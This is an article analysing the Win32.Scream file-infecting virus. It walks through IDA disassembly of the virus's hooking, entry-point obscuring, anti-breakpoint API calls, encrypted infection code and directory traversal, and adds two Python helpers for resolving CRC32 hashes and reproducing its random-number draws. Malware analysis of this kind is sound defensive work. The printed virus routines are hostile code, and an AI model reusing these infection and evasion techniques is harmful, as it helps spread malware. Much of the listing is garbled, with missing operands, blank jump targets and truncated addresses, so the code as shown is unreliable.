Analysis of Win32.Scream
- Valentine Kelley
- 10 years ago
1. Introduction

Scream is a very interesting virus, as it combines a lot of techniques. In this paper I'll cover all of its features and internals, dissecting it with a top-down approach for a better analysis. Moreover, the virus appears to be undetected by all anti-virus scanners, so I'll refer to it by the name hard-coded inside it (Win32.Scream). Most of the analysis was done with the help of a disassembler (IDA) and some other private tools.

2. Features

As I mentioned before, the virus contains a lot of techniques that I haven't seen in a virus before, and that is what makes it more interesting. Some of the features of the virus are:

- API Hooking Engine
- Stealth API Calls
- Entry Point Obscuring (EPO)
- Hard Coded Memory Access (HMA)
- Instruction Length Engine (ILE)
- Encryption/Decryption Engine (RDKE32)
- Random Number Generation Engine (MT)

Those are just some of the interesting features of the virus; the list goes on, but for the moment I have listed only some of them.

3. Pre Analysis

A not-so-complex per-process resident, entry point obscuring (EPO) virus which infects PE files. At runtime it launches a thread that performs directory traversal infection.

HMA: this engine removes the need for a delta offset for good. It changes every [mem32] operand to a new mem32 address, but one has to calculate that address oneself and pass it to the engine. The
engine will change all hard-coded memory accesses except where an operand, address or FS segment prefix is used.

ILE: this engine calculates the length of an instruction. Load ESI with a pointer to the instruction whose size you want.

RDKE32: the Random Decoding Key Engine (RDKE32) encrypts and decrypts the virus infection code with SHA.

RNGMT: this engine generates random numbers based on a matrix linear recurrence over a finite binary field. It provides for fast generation of very high quality pseudorandom numbers, having been designed specifically to rectify many of the flaws found in older algorithms.

4. Analysis

CODE: C nop
CODE: D mov esi, offset _debug
CODE: mov esi, offset FRD_Imported_Kernel32_API_Names
CODE: mov edi, offset CRC32_Imported_Kernel32_API_Names
CODE: C call FRC_MakeCRC32Table

CODE:004046A1 mov esi, offset FRD_Imported_Imagehlp_API_Names
CODE:004046A6 mov edi, offset CRC32_Imported_Imagehlp_API_Names
CODE:004046AB call FRC_MakeCRC32Table

CODE:004046B0 mov esi, offset FRD_Imported_Sfc_API_Names
CODE:004046B5 mov edi, offset CRC32_Imported_Sfc_API_Names
CODE:004046BA call FRC_MakeCRC32Table

CODE:004046BF mov esi, offset FRD_Imported_WinMM_API_Names
CODE:004046C4 mov edi, offset CRC32_Imported_WinMM_API_Names
CODE:004046C9 call FRC_MakeCRC32Table
CODE:004046CE mov esi, offset FRD_Imported_Shell32_API_Names
CODE:004046D3 mov edi, offset CRC32_Imported_Shell32_API_Names
CODE:004046D8 call FRC_MakeCRC32Table

CODE:004046DD mov esi, offset FRD_Hook_API_Names ; "CreateFileA"
CODE:004046E2 mov edi, offset API_Hook_Table

CODE:004046E7 mov al, [esi]
CODE:004046E9 test al, al
CODE:004046EB jz

CODE:004046ED call GetCRC32OfString

CODE:004046F2 mov [edi], ebx
CODE:004046F4 add edi, 0Ch
CODE:004046F7 jmp

CODE:004046F9 mov esi, offset FRD_File_Names
CODE:004046FE mov edi, offset CRC32_KERNEL32_DLL
CODE: call FRC_MakeCRC32Table

CODE: push offset FRC_FakeHost
CODE: D mov ER_CallingOffset, offset FRC_FakeHost
CODE: mov ER_Code, h
CODE: mov ER_Code_0, 90h
CODE: jmp EntryPoint

Before the virus runs it needs to do some preparatory work to set up its surroundings. First it computes CRC32 checksums of some API names for later use, then it sets up a fake EPO, and after that it jumps to the real starting point of the virus.

CODE: EntryPoint:

CODE: pushf
CODE: pusha
CODE: cmp ThreadHandle, 0
CODE: jz

CODE: B mov ecx, 24h
CODE: call RestoreEPOBytes

CODE: popa
CODE: popf
CODE: retn

CODE: call Initialize

CODE: D test eax, eax
CODE: F jz short

CODE: lea ebx, sub_4010ba
CODE: mov [ebp+0c4h], ebx
CODE: D lea ebx,
CODE: mov [ebp+0c8h], ebx
CODE: mov [ebp+0cch], esp
CODE: F lea ebx, [ebp+0c0h]
CODE: push ebx
CODE: xor ebx, ebx
CODE: push dword ptr fs:[ebx]
CODE: B pop dword ptr [ebp+0c0h]
CODE: pop dword ptr fs:[ebx]
CODE: push CRC32_KERNEL32_DLL
CODE: A call HookAPIs

CODE: F push CRC32_SHELL32_DLL
CODE: call HookAPIs

CODE: A push 0
CODE: C lea eax, MainThread
CODE: push esp
CODE: push 0
CODE: push 0
CODE: push eax
CODE: push 0
CODE: A push 0
CODE: C mov al, 1Ah
CODE: E call StealthAPI

CODE: mov ThreadHandle, eax
CODE: pop ebx
CODE: test eax, eax
CODE: B jz

CODE: D push 0FFFFFFFEh
CODE: F push eax
CODE: mov al, 1Ch
CODE: call StealthAPI

CODE: call UnInitialize

CODE: C mov ecx, 1024h
CODE:004010A1 call RestoreEPOBytes
CODE:004010A6 xor ebx, ebx
CODE:004010A8 push dword ptr [ebp+0c0h]
CODE:004010AE pop dword ptr fs:[ebx]
CODE:004010B1 add esp, 1000h
CODE:004010B7 popa
CODE:004010B8 popf
CODE:004010B9 retn

This is the real entry point of the virus. It first saves the registers so that it does not ruin the host's execution. Then, if the thread is already running, it restores the EPO and returns to the host. If the thread is not running, it initializes the virus's environment so that it can work; this initialization routine will be discussed later. Also, if nothing went wrong during the execution, the virus restores the EPO and leaves the routine immediately. Note that the virus uses SEH throughout its entire code to avoid crashing under any circumstances. Afterwards the virus hooks some APIs that the host might be using, then starts a thread that runs simultaneously with the host's code to perform a directory traversal search. Finally the virus cleans up after the changes it has made and returns to the host.
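Both the pre-work before EntryPoint and several later routines (HookAPIs, GetAPIsFromCRC32List, DirectoryTraversal) compare CRC32 checksums instead of strings, so an analyst mostly sees 32-bit constants rather than API or file names. The following is an added example for this write-up, not the virus's code and not the author's private tooling: it re-implements the checksum that GetCRC32OfString computes (initial 0FFFFFFFFh, reflected polynomial 0EDB88320h, final NOT) and uses it to map recovered constants back to names, including the uppercased spelling that HookAPIs and DirectoryTraversal hash for DLL and file names. The name list, the hook-table bytes and the handler deltas are constructed for the demonstration.

```python
"""CRC32 as computed by Scream's GetCRC32OfString, plus a hash resolver.

Added example for this write-up: not the virus's code and not the
analysis author's tooling. The name list and the table image below are
constructed; a real resolver would be fed every export name of the DLLs
of interest and the constants pulled from the sample.
"""
import struct
import zlib

CRC32_POLY = 0xEDB88320   # xor ax, 8320h / xor bx, 0EDB8h in the listing
# API_Hook_Table record as HookAPIs walks it: CRC32, handler delta added
# to EntryPoint, saved original pointer (12 bytes, cf. add edi, 0Ch).
HOOK_ENTRY = struct.Struct("<III")


def crc32_string(data: bytes) -> int:
    """Bit-serial CRC32 in the order the listing does it.

    The listing xors the byte into CL, shifts the running CRC right by 8
    (mov cl,ch / mov ch,dl / mov dl,dh), runs eight shr/rcr steps on the
    byte in BX:AX xoring 0EDB88320h whenever a 1 falls out, and folds
    BX:AX back into the CRC. That is the table-driven form of the loop
    below; both give the same value as zlib.crc32.
    """
    crc = 0xFFFFFFFF                      # xor ecx,ecx / dec ecx / mov edx,ecx
    for byte in data:
        crc ^= byte                       # xor al, cl
        for _ in range(8):                # mov dh, 8 ... dec dh / jnz
            if crc & 1:                   # rcr ax,1 / jnb
                crc = (crc >> 1) ^ CRC32_POLY
            else:
                crc >>= 1
    return crc ^ 0xFFFFFFFF               # not edx / not ecx


# Constructed list: names the write-up shows being hooked or imported.
KNOWN_NAMES = [
    "CreateFileA", "WinExec", "OpenFile", "_lopen", "CreateProcessA",
    "CopyFileA", "MoveFileA", "MoveFileExA", "FindFirstFileA",
    "GetFullPathNameA", "GetShortPathNameA", "SetFileAttributesA",
    "GetFileAttributesA", "GetBinaryTypeA", "ExitProcess", "ShellAboutA",
    "KERNEL32.DLL", "SHELL32.DLL", "IMAGEHLP.DLL", "SFC.DLL", "WINMM.DLL",
]


def build_hash_table(names):
    """Map CRC32 -> name for both the literal and the uppercased spelling.

    HookAPIs and DirectoryTraversal run Uppercase over DLL and file names
    before hashing, while API names are hashed as written, so both forms
    must be indexed for a lookup to succeed.
    """
    table = {}
    for name in names:
        for form in {name, name.upper()}:
            table[crc32_string(form.encode("ascii"))] = name
    return table


def resolve(hashes, table):
    """Resolve a list of CRC32 constants; unknown ones are reported as such."""
    return [table.get(h, "<unresolved 0x%08X>" % h) for h in hashes]


def parse_hook_table(blob: bytes, table):
    """Walk an API_Hook_Table image: 12-byte records up to a zero entry.

    Returns (name, handler delta) pairs. HookAPIs only tests the first
    byte of the CRC for zero (cmp byte ptr [edi], 0); a full-dword test is
    used here so a hash that happens to end in 00 does not cut the walk.
    """
    entries = []
    for off in range(0, len(blob) - HOOK_ENTRY.size + 1, HOOK_ENTRY.size):
        crc, delta, _saved = HOOK_ENTRY.unpack_from(blob, off)
        if crc == 0:
            break
        entries.append((resolve([crc], table)[0], delta))
    return entries


def self_check() -> bool:
    """Cross-check against the standard CRC32 test vector and zlib."""
    if crc32_string(b"123456789") != 0xCBF43926:
        return False
    return all(crc32_string(n.encode()) == zlib.crc32(n.encode()) & 0xFFFFFFFF
               for n in KNOWN_NAMES)


# Constructed table image: two hooked entries (deltas are placeholders)
# followed by the zero terminator.
SAMPLE_HOOK_TABLE = (
    HOOK_ENTRY.pack(crc32_string(b"CreateFileA"), 0x10, 0)
    + HOOK_ENTRY.pack(crc32_string(b"WinExec"), 0x20, 0)
    + bytes(HOOK_ENTRY.size)
)

if __name__ == "__main__":
    names = build_hash_table(KNOWN_NAMES)
    print(self_check())
    print(parse_hook_table(SAMPLE_HOOK_TABLE, names))
    print(resolve([crc32_string(b"KERNEL32.DLL"), 0x12345678], names))
```

Because the checksum is plain CRC32, any constant table in the sample can be resolved offline against an export-name list; indexing the uppercased spelling as well is what makes the DLL-name and file-name constants resolve, since those strings pass through Uppercase before GetCRC32OfString.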
CODE:004010E1 Initialize proc near

CODE:004010E1 arg_0 = dword ptr 4
CODE:004010E1 SFC_BaseAddress = dword ptr 8
CODE:004010E1 WINMM_BaseAddress = dword ptr 0Ch
CODE:004010E1 SHELL32_BaseAddress = dword ptr 10h
CODE:004010E1 arg_14 = dword ptr 18h
CODE:004010E1 arg_8c = dword ptr 90h
CODE:004010E1 API_SFC_IN_MSTRUC = dword ptr 9Ch
CODE:004010E1 API_WINMM_IN_MSTRUC = dword ptr 0A0h
CODE:004010E1 arg_b8 = dword ptr 0BCh
CODE:004010E1 arg_cc = dword ptr 0D0h
CODE:004010E1 arg_d0 = dword ptr 0D4h
CODE:004010E1 arg_d4 = dword ptr 0D8h
CODE:004010E1 arg_d8 = dword ptr 0DCh
CODE:004010E1 arg_1020 = dword ptr 1024h

CODE:004010E1 cmp InitializeState, 0
CODE:004010E8 jnz short Initialize

CODE:004010EA or InitializeState, 0FFFFFFFFh
CODE:004010F1 pop ebx
CODE:004010F2 mov ecx, 1000h
CODE:004010F7 sub esp, ecx
CODE:004010F9 mov ebp, esp
CODE:004010FB mov PointerToMSTRUC, ebp
CODE: cld
CODE: xor eax, eax
CODE: mov edi, esp
CODE: rep stosb
CODE: push ebx
CODE: lea ebx, sub_401269
CODE: F mov [ebp+arg_d0], ebx
CODE: lea ebx,
CODE: B mov [ebp+arg_d4], ebx
CODE: mov [ebp+arg_d8], esp
CODE: lea ebx, [ebp+arg_cc]
CODE: D push ebx
CODE: E xor ebx, ebx
CODE: push dword ptr fs:[ebx]
CODE: pop [ebp+arg_cc]
CODE: pop dword ptr fs:[ebx]
CODE: C mov eax, [esp+arg_1020]
CODE: rdtsc
CODE: xchg eax, ebx
CODE: xchg eax, edx
CODE: mov ecx, 10h
CODE: C div ecx
CODE: E lea edi, Init_Key_Start
CODE: xor [edi+edx*4], ebx
CODE: push 10h
CODE: push edi
CODE: A call init_by_array

CODE: F call GetKernel32Base

CODE: lea eax, [ebp+arg_14]
CODE: lea ebx, CRC32_Imported_Kernel32_API_Names
CODE: D push dword ptr [ebp+0]
CODE: push 1Eh
CODE: push eax
CODE: push ebx
CODE: call GetAPIsFromCRC32List

CODE: test eax, eax
CODE: B jz

CODE: lea esi, NAME_IMAGEHLP_DLL
CODE: push esi
CODE: mov al, 3
CODE: A call StealthAPI

CODE: F test eax, eax

CODE: mov [ebp+arg_0], eax
CODE: A lea edx, [ebp+arg_8c]
CODE:004011A0 lea ebx, CRC32_Imported_Imagehlp_API_Names
CODE:004011A6 push eax
CODE:004011A7 push 3
CODE:004011A9 push edx
CODE:004011AA push ebx
CODE:004011AB call GetAPIsFromCRC32List

CODE:004011B0 test eax, eax

CODE:004011B8 or SFC_enabled, 0FFFFFFFFh
CODE:004011BF lea esi, NAME_SFC_DLL
CODE:004011C5 push esi
CODE:004011C6 mov al, 3
CODE:004011C8 call StealthAPI

CODE:004011CD test eax, eax
CODE:004011CF jz

CODE:004011D1 mov [ebp+SFC_BaseAddress], eax
CODE:004011D4 lea edx, [ebp+API_SFC_IN_MSTRUC]
CODE:004011DA lea ebx, CRC32_Imported_Sfc_API_Names
CODE:004011E0 push eax
CODE:004011E1 push 1
CODE:004011E3 push edx
CODE:004011E4 push ebx
CODE:004011E5 call GetAPIsFromCRC32List

CODE:004011EA test eax, eax
CODE:004011EC jz

CODE:004011EE and SFC_enabled, 0

CODE:004011F5 lea esi, NAME_WINMM_DLL
CODE:004011FB push esi
CODE:004011FC mov al, 3
CODE:004011FE call StealthAPI

CODE: test eax, eax
CODE: jz

CODE: mov [ebp+WINMM_BaseAddress], eax
CODE: A lea edx, [ebp+API_WINMM_IN_MSTRUC]
CODE: lea ebx, CRC32_Imported_WinMM_API_Names
CODE: push eax
CODE: push 7
CODE: push edx
CODE: A push ebx
CODE: B call GetAPIsFromCRC32List

CODE: test eax, eax
CODE: jz

CODE: lea esi, NAME_SHELL32_DLL
CODE: A push esi
CODE: B mov al, 3
CODE: D call StealthAPI

CODE: test eax, eax
CODE: jz

CODE: mov [ebp+SHELL32_BaseAddress], eax
CODE: lea edx, [ebp+arg_b8]
CODE: F lea ebx, CRC32_Imported_Shell32_API_Names
CODE: push eax
CODE: push 1
CODE: push edx
CODE: push ebx
CODE: A call GetAPIsFromCRC32List

CODE: F test eax, eax
CODE: jz short

CODE: stc
CODE: sbb eax, eax

CODE: xor ebx, ebx
CODE: push [ebp+arg_cc]
CODE: E pop dword ptr fs:[ebx]
CODE: and InitializeState, 0
CODE: retn
CODE: Initialize endp

In the previous block the virus initializes its surroundings so that it can work correctly; in brief, it allocates memory and retrieves memory addresses.

CODE: UnInitialize proc near

CODE: push eax
CODE: push dword ptr [ebp+4]
CODE: mov al, 4
CODE: call StealthAPI

CODE: B push dword ptr [ebp+8]
CODE: E mov al, 4
CODE:004012A0 call StealthAPI

CODE:004012A5 push dword ptr [ebp+0ch]
CODE:004012A8 mov al, 4
CODE:004012AA call StealthAPI

CODE:004012AF push dword ptr [ebp+10h]
CODE:004012B2 mov al, 4
CODE:004012B4 call StealthAPI

CODE:004012B9 pop eax
CODE:004012BA retn

CODE:004012BA UnInitialize endp

The previous code block frees the libraries that the virus has been using throughout the code and then returns.

CODE:004012BB RestoreEPOBytes proc near
CODE:004012BB arg_0 = dword ptr 4

CODE:004012BB mov ebx, [esp+ecx+arg_0]
CODE:004012BF lea edi, [ebx-5]
CODE:004012C2 mov [esp+ecx+arg_0], edi
CODE:004012C6 mov ecx, 10h
CODE:004012CB lea esi, ER_CallingOffset

CODE:004012D1 lodsd
CODE:004012D2 cmp eax, ebx
CODE:004012D4 jz

CODE:004012D6 add esi, 5

CODE:004012DB movsb
CODE:004012DC movsd
CODE:004012DD retn

CODE:004012DD RestoreEPOBytes endp

The previous code block gets the return address from the stack. Since this address points past the EPO code, it has to be made to point to the start of that code, so the return address on the stack is updated. After that the routine restores the EPO code that called it, searching through the data area for the record of the call site that entered the virus.

CODE:004012DE MainThread proc near

CODE:004012DE var_38 = dword ptr -38h
CODE:004012DE arg_10e4 = dword ptr 10E8h

CODE:004012DE pushf
CODE:004012DF pusha
CODE:004012E0 mov eax, PointerToMSTRUC
CODE:004012E5 mov ThreadPointerToMSTRUC, eax
CODE:004012EA call Initialize

CODE:004012EF mov ebx, PointerToMSTRUC
CODE:004012F5 xchg ebx, ThreadPointerToMSTRUC
CODE:004012FB mov PointerToMSTRUC, ebx
CODE: test eax, eax
CODE: jnz

CODE: popa
CODE: popf
CODE: retn

CODE: ;
CODE: lea ebx, sub_4013fb
CODE: E mov [ebp+114h], ebx
CODE: lea ebx,
CODE: A mov [ebp+118h], ebx
CODE: mov [ebp+11ch], esp
CODE: lea ebx, [ebp+110h]
CODE: C push ebx
CODE: D xor ebx, ebx
CODE: F push dword ptr fs:[ebx]
CODE: pop dword ptr [ebp+110h]
CODE: pop dword ptr fs:[ebx]
CODE: B lea esi, word_403f16
CODE: lea edi, InfectFile

CODE: _debug:
CODE: nop
CODE: push 698h
CODE: D push edi
CODE: E push esi
CODE: F call RDKE32Decrypt

CODE: cmp ThreadExecution, 0FFFFFFFFh
CODE: B jz short

CODE: D or Infect_Encrypted, 0FFFFFFFFh
CODE: mov ecx, 104h
CODE: sub esp, ecx
CODE: B push esp
CODE: C push ecx
CODE: D mov al, 0Dh
CODE: F call StealthAPI

CODE: test eax, eax
CODE: jz short

CODE: push 5C3A43h

CODE: D mov eax, 10h
CODE: call RandomNumber

CODE: inc eax
CODE: mov [ebp+27ch], eax
CODE: E push esp
CODE: F mov al, 10h
CODE: call StealthAPI

CODE: cmp al, 2
CODE: jz

CODE: A cmp al, 3
CODE: C jz

CODE: E cmp al, 4
CODE:004013A0 jnz short

CODE:004013A2 push esp
CODE:004013A3 mov al, 0Ch
CODE:004013A5 call StealthAPI

CODE:004013AA call DirectoryTraversal

CODE:004013AF cmp ThreadExecution, 0FFFFFFFFh
CODE:004013B6 jz short

CODE:004013B8 cmp [esp+38h+var_38], '\:Z'
CODE:004013BF jz short

CODE:004013C1 inc [esp+38h+var_38]
CODE:004013C4 jmp short

CODE:004013C6 pop edx
CODE:004013C7 push esp
CODE:004013C8 mov al, 0Ch
CODE:004013CA call StealthAPI

CODE:004013CF add esp, 104h

CODE:004013D5 call UnInitialize

CODE:004013DA xor ebx, ebx
CODE:004013DC push dword ptr [ebp+110h]
CODE:004013E2 pop dword ptr fs:[ebx]
CODE:004013E5 mov eax, [ebp+7ch]
CODE:004013E8 mov [esp-0cch+arg_10e4], eax
CODE:004013EF add esp, 1000h
CODE:004013F5 popa
CODE:004013F6 popf
CODE:004013F7 push 0
CODE:004013F9 call eax

CODE:004013F9 MainThread endp

The previous code block, in brief, allocates memory for the virus, retrieves API addresses, decrypts the infection code and performs a directory traversal search.
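MainThread draws its per-run infection budget with mov eax, 10h / call RandomNumber / inc eax, and the ShellAboutA hook handler later decides whether to start PayloadThread with mov eax, 3 / call RandomNumber / test eax, eax. RandomNumber itself is genrand_int32 reduced modulo the range passed in EAX, and the generator is the Mersenne Twister that the RNGMT engine describes, seeded through init_by_array with the 16-dword key at Init_Key_Start. The following is an added example for this write-up, not the virus's code: a straight implementation of the reference MT19937 routines the listing names (init_genrand, init_by_array, genrand_int32) and of RandomNumber, used to reproduce those two draws and to cross-check the generator against CPython's random module, which uses the same algorithm and seeding routine. The 16-dword key is constructed; the real one is perturbed with RDTSC output before init_by_array is called.

```python
"""MT19937 as used by Scream's RNGMT and the two draws the listing makes.

Added example for this write-up, not the virus's code. CONSTRUCTED_KEY
stands in for Init_Key_Start; the sample xors one dword of its key with
RDTSC output, which is not reproduced here.
"""
import random

N, M = 624, 397
MATRIX_A = 0x9908B0DF
UPPER, LOWER = 0x80000000, 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


class MT19937:
    def __init__(self):
        self.mt = [0] * N
        self.mti = N + 1                 # N+1 means "not seeded yet"

    def init_genrand(self, s):
        self.mt[0] = s & MASK32
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & MASK32
        self.mti = N

    def init_by_array(self, key):
        """Seed from a dword array; the listing calls this with
        push 10h / push edi, i.e. 16 dwords at Init_Key_Start."""
        self.init_genrand(19650218)
        i, j = 1, 0
        for _ in range(max(N, len(key))):
            prev = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((prev ^ (prev >> 30)) * 1664525))
                          + key[j] + j) & MASK32
            i += 1
            j += 1
            if i >= N:
                self.mt[0] = self.mt[N - 1]
                i = 1
            if j >= len(key):
                j = 0
        for _ in range(N - 1):
            prev = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((prev ^ (prev >> 30)) * 1566083941))
                          - i) & MASK32
            i += 1
            if i >= N:
                self.mt[0] = self.mt[N - 1]
                i = 1
        self.mt[0] = 0x80000000

    def genrand_int32(self):
        if self.mti >= N:
            if self.mti == N + 1:
                self.init_genrand(5489)      # reference default seed
            for kk in range(N):              # regenerate the state block
                y = (self.mt[kk] & UPPER) | (self.mt[(kk + 1) % N] & LOWER)
                self.mt[kk] = self.mt[(kk + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
            self.mti = 0
        y = self.mt[self.mti]
        self.mti += 1
        y ^= y >> 11                         # tempering
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32

    def random_number(self, limit):
        """RandomNumber: push eax / call genrand_int32 / pop ecx / div ecx,
        result taken from EDX, i.e. genrand_int32 % limit (modulo bias kept)."""
        return self.genrand_int32() % limit


def infection_budget(rng):
    """MainThread: mov eax, 10h / call RandomNumber / inc eax -> 1..16 files."""
    return rng.random_number(0x10) + 1


def payload_fires(rng):
    """ShellAboutA hook: mov eax, 3 / call RandomNumber / test eax, eax / jnz skip."""
    return rng.random_number(3) == 0


def payload_rate(rng, draws):
    """Fraction of hook invocations that would start PayloadThread."""
    return sum(payload_fires(rng) for _ in range(draws)) / draws


def matches_cpython(seed, count=8):
    """CPython seeds its MT19937 with init_by_array over the 32-bit words of
    an integer seed, so getrandbits(32) must reproduce genrand_int32 exactly."""
    ours = MT19937()
    ours.init_by_array([seed & MASK32])
    ref = random.Random(seed)
    return all(ours.genrand_int32() == ref.getrandbits(32) for _ in range(count))


CONSTRUCTED_KEY = [0x1000 + i for i in range(16)]   # 16 dwords, constructed

if __name__ == "__main__":
    rng = MT19937()
    rng.init_by_array(CONSTRUCTED_KEY)
    print([infection_budget(rng) for _ in range(5)])
    print(payload_rate(rng, 30000))
    print(matches_cpython(12345))
```

With init_genrand(5489) the first output is the reference value 3499211612, and the init_by_array path reproduces CPython's stream for the same integer seed, which confirms the implementation before it is used to reason about the sample's draws; run against the constructed key, the payload branch is taken on about one ShellAboutA call in three and the per-run budget is uniform over 1 to 16 files.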
CODE: PayloadThread proc near

CODE: arg_ff4 = dword ptr 0FF8h

CODE: pushf
CODE: pusha
CODE: mov eax, PointerToMSTRUC
CODE: mov Thread2PointerToMSTRUC, eax
CODE: E call Initialize

CODE: mov ebx, PointerToMSTRUC
CODE: xchg ebx, Thread2PointerToMSTRUC
CODE: F mov PointerToMSTRUC, ebx
CODE: test eax, eax
CODE: jnz

CODE: popa
CODE: A popf
CODE: B retn

CODE: C lea ebx, sub_4014b1
CODE: mov [ebp+124h], ebx
CODE: lea
CODE: E mov [ebp+128h], ebx
CODE: mov [ebp+12ch], esp
CODE: A lea ebx, [ebp+120h]
CODE: push ebx
CODE: xor ebx, ebx
CODE: push dword ptr fs:[ebx]
CODE: pop dword ptr [ebp+120h]
CODE: C pop dword ptr fs:[ebx]
CODE: F lea eax, Payload_Song
CODE: push eax
CODE: call PlayMidiSong

CODE: B call UnInitialize

CODE: xor ebx, ebx
CODE: push dword ptr [ebp+120h]
CODE: pop dword ptr fs:[ebx]
CODE: B mov eax, [ebp+7ch]
CODE: E mov [esp+24h+arg_ff4], eax
CODE:004014A5 add esp, 1000h
CODE:004014AB popa
CODE:004014AC popf
CODE:004014AD push 0
CODE:004014AF call eax

CODE:004014AF PayloadThread endp
The previous code block plays a small MIDI tune as the payload of the virus.

CODE:004014D8 StealthAPI proc near

CODE:004014D8 var_24 = dword ptr -24h

CODE:004014D8 movzx eax, al
CODE:004014DB mov eax, [ebp+eax*4+18h]
CODE:004014DF pusha
CODE:004014E0 push 0Ah
CODE:004014E2 xchg eax, esi

CODE:004014E3 cmp byte ptr [esi], 0CCh
CODE:004014E6 jz

CODE:004014E8 cmp word ptr [esi], 0CD03h
CODE:004014ED jz

CODE:004014EF call ILE

CODE:004014F4 add esi, ecx
CODE:004014F6 jecxz

CODE:004014F8 dec [esp+24h+var_24]
CODE:004014FB jnz

CODE:004014FD pop eax
CODE:004014FE popa
CODE:004014FF jmp eax

CODE: pop eax
CODE: popa
CODE: retn

CODE: StealthAPI endp

The previous code block contains the StealthAPI function, one of the most important functions in this virus: it looks up the API address by its index in AL and searches the API's code for breakpoints before transferring control to it.

CODE: PlayMidiSong proc near

CODE: var_38 = dword ptr -38h
CODE: arg_164 = dword ptr 168h

CODE: pusha
CODE: mov ecx, 178h
CODE: A sub esp, ecx
CODE: C mov edi, esp
CODE: E xor eax, eax
CODE: rep stosb
CODE: mov edi, esp
CODE: lea eax, [edi]
CODE: push 0
CODE: push 0
CODE: A push 0
CODE: C push 0FFFFFFFFh
CODE: E push eax
CODE: F mov al, 27h
CODE: call StealthAPI

CODE: test eax, eax

CODE: E mov esi, [esp+34h+arg_164]
CODE: lodsd
CODE: xchg eax, ecx
CODE: imul edx, ecx, 10h
CODE: A add edx, esi
CODE: C xor ebx, ebx

CODE: E lodsd
CODE: F mov [edi+ebx+10h], eax
CODE: push eax
CODE: lodsd
CODE: xchg eax, [esp+38h+var_38]
CODE: push eax
CODE: add eax, 0B0h
CODE: E push 0
CODE: push 0
CODE: push eax
CODE: call SendData

CODE: pop eax
CODE: add eax, 0C0h
CODE: E push 0
CODE: push [esp+3ch+var_38]
CODE: push eax
CODE: call SendData

CODE: A pop eax
CODE: B lodsd
CODE: C mov [edi+ebx+14h], eax
CODE: lodsd
CODE: mov [edi+ebx+18h], eax
CODE: mov [edi+ebx+1ch], edx
CODE: add edx, eax
CODE: B add ebx, 18h

CODE: and dword ptr [edi+0ch], 0
CODE: and dword ptr [edi+8], 0
CODE: mov ecx, 0Fh
CODE: D xor ebx, ebx

CODE: F mov esi, [edi+ebx+1ch]
CODE: mov edx, [edi+ebx+10h]
CODE: add edx, 90h
CODE: D mov eax, [edi+ebx+18h]
CODE:004015A1 add eax, [edi+ebx+20h]
CODE:004015A5 test eax, eax
CODE:004015A7 jz

CODE:004015A9 or dword ptr [edi+8], 0FFFFFFFFh
CODE:004015AD cmp dword ptr [edi+0ch], 0
CODE:004015B1 jz

CODE:004015B3 dec dword ptr [edi+ebx+20h]
CODE:004015B7 jnz

CODE:004015B9 cmp byte ptr [edi+ebx+24h], 80h
CODE:004015BE jz

CODE:004015C0 sub esi, 5
CODE:004015C3 push ecx
CODE:004015C4 mov ecx, 5
CODE:004015C9 xor eax, eax

CODE:004015CB push 0
CODE:004015CD lodsb
CODE:004015CE push eax
CODE:004015CF push edx
CODE:004015D0 call SendData

CODE:004015D7 pop ecx

CODE:004015D8 mov eax, [edi+ebx+18h]
CODE:004015DC test eax, eax
CODE:004015DE jz

CODE:004015E0 lodsb
CODE:004015E1 dec dword ptr [edi+ebx+18h]
CODE:004015E5 mov ah, al
CODE:004015E7 and ah, 80h
CODE:004015EA mov [edi+ebx+24h], ah
CODE:004015EE and al, 7Fh
CODE:004015F0 mov [edi+ebx+20h], al
CODE:004015F4 test ah, ah
CODE:004015F6 jnz short

CODE:004015F8 push ecx
CODE:004015F9 mov ecx, 5
CODE:004015FE sub [edi+ebx+18h], ecx
CODE: xor eax, eax

CODE: push dword ptr [edi+ebx+14h]
CODE: lodsb
CODE: push eax
CODE: A push edx
CODE: B call SendData

CODE: pop ecx

CODE: mov [edi+ebx+1ch], esi

CODE: add ebx, 18h
CODE: A dec ecx

CODE: or dword ptr [edi+0ch], 0FFFFFFFFh
CODE: push 50h
CODE: mov al, 1
CODE: call StealthAPI

CODE: E cmp dword ptr [edi+8], 0

CODE: push dword ptr [edi]
CODE: A mov al, 24h
CODE: C call StealthAPI

CODE: add esp, 178h
CODE: popa
CODE: retn 4

CODE: PlayMidiSong endp

The previous code block plays an embedded MIDI song, hard-coded in the virus as notes.

CODE: B SendData proc near
CODE: B ARG1 = dword ptr 4
CODE: B ARG2 = dword ptr 8
CODE: B ARG3 = dword ptr 0Ch

CODE: B pusha
CODE: C mov eax, [esp+20h+ARG3]
CODE: shl eax, 10h
CODE: mov ebx, [esp+20h+ARG2]
CODE: shl ebx, 8
CODE: A add eax, ebx
CODE: C add eax, [esp+20h+ARG1]
CODE: push eax
CODE: push dword ptr [edi]
CODE: mov al, 28h
CODE: call StealthAPI

CODE: A test eax, eax
CODE: C popa
CODE: D retn 0Ch

CODE: D SendData endp

The previous code block is used to send data to the MIDI output device.

CODE: HookAPIs proc near

CODE: pusha
CODE: push 0
CODE: mov al, 2
CODE: call StealthAPI

CODE: A xchg eax, ebx
CODE: B mov esi, [ebx+3ch]
CODE: E mov esi, [ebx+esi+80h]
CODE: add esi, ebx

CODE: cmp dword ptr [esi], 0
CODE: A jz

CODE: C push esi
CODE: D mov esi, [esi+0ch]
CODE: add esi, ebx
CODE: push ebx
CODE: call Uppercase

CODE: call GetCRC32OfString

CODE: D cmp [esp+2ch], ebx
CODE:004016A1 jz

CODE:004016A3 pop ebx
CODE:004016A4 pop esi
CODE:004016A5 add esi, 14h
CODE:004016A8 jmp short

CODE:004016AA ;

CODE:004016AA pop ebx
CODE:004016AB pop esi
CODE:004016AC xor ecx, ecx
CODE:004016AE mov edx, [esi+10h]
CODE:004016B1 add edx, ebx
CODE:004016B3 mov esi, [esi]
CODE:004016B5 add esi, ebx

CODE:004016B7 lodsd
CODE:004016B8 test eax, eax
CODE:004016BA jz

CODE:004016BC push esi
CODE:004016BD lea esi, [eax+ebx+2]
CODE:004016C1 lea edi, API_Hook_Table
CODE:004016C7 cmp al, 80h
CODE:004016C9 jz

CODE:004016CB cmp byte ptr [edi], 0
CODE:004016CE jz

